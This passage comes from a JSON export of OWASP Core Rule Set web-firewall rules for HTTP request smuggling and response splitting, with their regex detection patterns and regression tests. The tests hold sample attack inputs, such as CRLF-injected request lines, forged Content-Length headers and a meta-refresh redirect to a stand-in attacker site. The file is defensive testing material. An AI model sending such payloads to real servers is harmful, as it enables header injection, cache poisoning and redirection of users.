"2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 117, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 117, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 117, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 117, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 117, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 117 } }, { "rule_id": "943017", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 124, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 124, "act_quote": "no_quote", "act_arg": "943017", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 124, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 124, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 124, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 124, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 124, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 124, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 124 } }, { "rule_id": "943018", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "4", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 125, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "4", "actions": [ { "act_name": "id", "lineno": 125, "act_quote": "no_quote", "act_arg": "943018", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 125, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 125, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 125, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 125, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 125, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 125, "act_quote": "no_quote", "act_arg": "END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 125 } }, { "rule_id": "921011", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "1", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 17, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 17, "act_quote": "no_quote", "act_arg": "921011", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 17, "act_quote": "no_quote", "act_arg": "1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 17, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 17, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 17 } }, { "rule_id": "921012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 18, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 18, "act_quote": "no_quote", "act_arg": "921012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 18, "act_quote": "no_quote", "act_arg": "END-REQUEST-921-PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 18 } }, { "rule_id": "921110", "has_tests": true, "detection": { "variables": [ { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "REQUEST_BODY", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\\s+[^\\s]+\\s+http/\\d", "negated": false } }, "transformations": [ "none", "htmlEntityDecode", "lowercase" ], "metadata": { "phase": "2", "message": "HTTP Request Smuggling Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/33" ] }, "test_cases": [ { "description": "HTTP Response Splitting", "test_id": 1, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%0aPOST / HTTP/1.1" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%0aPOST / HTTP/1.1" } ] }, { "description": "HTTP Response Splitting", "test_id": 2, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=aaa%0aGET+/+HTTP/1.1" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=aaa%0aGET+/+HTTP/1.1" } ] }, { "description": "HTTP Response Splitting", "test_id": 3, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=aaa%0dHEAD+http://example.com/+HTTP/1.1" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=aaa%0dHEAD+http://example.com/+HTTP/1.1" } ] }, { "description": "HTTP Response Splitting - pre-HTTP/1.1", "test_id": 4, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=aaa%0d%0aGet+/foo%0d" }, "expected": { "should_block": false, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=aaa%0d%0aGet+/foo%0d" } ] }, { "description": "HTTP Response Splitting", "test_id": 5, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Cache-Control": "no-cache, no-store, must-revalidate", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=aaa%0d%0aGet+foo+bar" }, "expected": { "should_block": false, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=aaa%0d%0aGet+foo+bar" } ] }, { "description": "HTTP Request Smuggling bypass with Content-Type text/plain", "test_id": 6, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent", "Content-Type": "text/plain", "Content-Length": "36" }, "data": "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "barGET /a.html HTTP/1.1\r\nSomething: GET /b.html HTTP/1.1\r\nHost: foo.com\r\nUser-Agent: foo\r\nAccept: */*\r\n\r\n" } ] }, { "description": "HTTP Request Smuggling with not supported HTTP versions such as HTTP/1.2", "test_id": 7, "request": { "method": "GET", "uri": "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F1.2" } ] }, { "description": "HTTP Request Smuggling with not supported HTTP versions such as HTTP/3", "test_id": 8, "request": { "method": "GET", "uri": "/?arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "arg1=GET%20http%3A%2F%2Fwww.foo.bar%20HTTP%2F3.2" } ] }, { "description": "HTTP Response Splitting false negative test", "test_id": 9, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "var=soundtrack Gympl\r\nanything" }, "expected": { "should_block": false, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=soundtrack Gympl\r\nanything" } ] }, { "description": "HTTP Response Splitting false positive test issue 2054", "test_id": 10, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "var=budget foo)\n" }, "expected": { "should_block": false, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=budget foo)\n" } ] }, { "description": "HTTP Response Splitting false positive test issue 2054", "test_id": 11, "request": { "method": "POST", "uri": "/", "headers": { "Host": "localhost", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "User-Agent": "OWASP CRS test agent" }, "data": "var=get it\n" }, "expected": { "should_block": false, "rule_ids": [ 921110 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=get it\n" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 34, "variables": [ { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_BODY", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?:get|post|head|options|connect|put|delete|trace|track|patch|propfind|propatch|mkcol|copy|move|lock|unlock)\\s+[^\\s]+\\s+http/\\d", "actions": [ { "act_name": "id", "lineno": 35, "act_quote": "no_quote", "act_arg": "921110", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 36, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 37, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 38, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 39, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 39, "act_quote": "no_quote", "act_arg": "htmlEntityDecode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 39, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 40, "act_quote": "quotes", "act_arg": "HTTP Request Smuggling Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 41, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 42, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 43, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 44, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 45, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 46, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 47, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 48, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 49, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/33", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 50, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 51, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 52, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 53, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 34 } }, { "rule_id": "921120", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "[\\r\\n]\\W*?(?:content-(?:type|length)|set-cookie|location):\\s*\\w", "negated": false } }, "transformations": [ "none", "lowercase" ], "metadata": { "phase": "2", "message": "HTTP Response Splitting Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/34" ] }, "test_cases": [ { "description": "HTTP response splitting (921120) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921120 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam" } ] }, { "description": "HTTP Response splitting attack", "test_id": 2, "request": { "method": "GET", "uri": "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw", "headers": { "Host": "localhost", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921120 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "somevar=foobar%0d%0aContent-Length:%2002343432423ftw" } ] }, { "description": "Fix FP issue 1615. Header followed by word chars.", "test_id": 3, "request": { "method": "GET", "uri": "/file.jsp?somevar=%0A%0Dlocation:%0A%0D", "headers": { "Host": "localhost", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 921120 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "somevar=%0A%0Dlocation:%0A%0D" } ] }, { "description": "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%0d%0aContent-Length: 0" }, "expected": { "should_block": true, "rule_ids": [ 921120 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%0d%0aContent-Length: 0" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 67, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "[\\r\\n]\\W*?(?:content-(?:type|length)|set-cookie|location):\\s*\\w", "actions": [ { "act_name": "id", "lineno": 68, "act_quote": "no_quote", "act_arg": "921120", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 69, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 70, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 71, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 72, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 72, "act_quote": "no_quote", "act_arg": "lowercase", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 73, "act_quote": "quotes", "act_arg": "HTTP Response Splitting Attack", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 74, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 75, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 76, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 77, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 78, "act_quote": "quotes", "act_arg": "attack-protocol", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 79, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 80, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 81, "act_quote": "quotes", "act_arg": "OWASP_CRS/PROTOCOL-ATTACK", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 82, "act_quote": "quotes", "act_arg": "capec/1000/210/272/220/34", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 83, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 84, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 85, "act_quote": "quotes", "act_arg": "tx.http_violation_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 86, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 67 } }, { "rule_id": "921130", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?:\\bhttp/\\d|<(?:html|meta)\\b)", "negated": false } }, "transformations": [ "none", "htmlEntityDecode", "lowercase" ], "metadata": { "phase": "2", "message": "HTTP Response Splitting Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-protocol" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-protocol", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/PROTOCOL-ATTACK", "capec/1000/210/272/220/34" ] }, "test_cases": [ { "description": "HTTP response splitting (921130) from old modsec regressions", "test_id": 1, "request": { "method": "GET", "uri": "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E", "headers": { "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-sg", "Host": "localhost", "Keep-Alive": "300", "Proxy-Connection": "keep-alive", "Referer": "http", "User-Agent": "OWASP CRS test agent" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921130 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" } ] }, { "description": "HTTP Response splitting attack: cookie data", "test_id": 2, "request": { "method": "GET", "uri": "/", "headers": { "Host": "localhost", "Cookie": "oreo=munchmuch%0d%0a%0d%0a", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 921130 ] }, 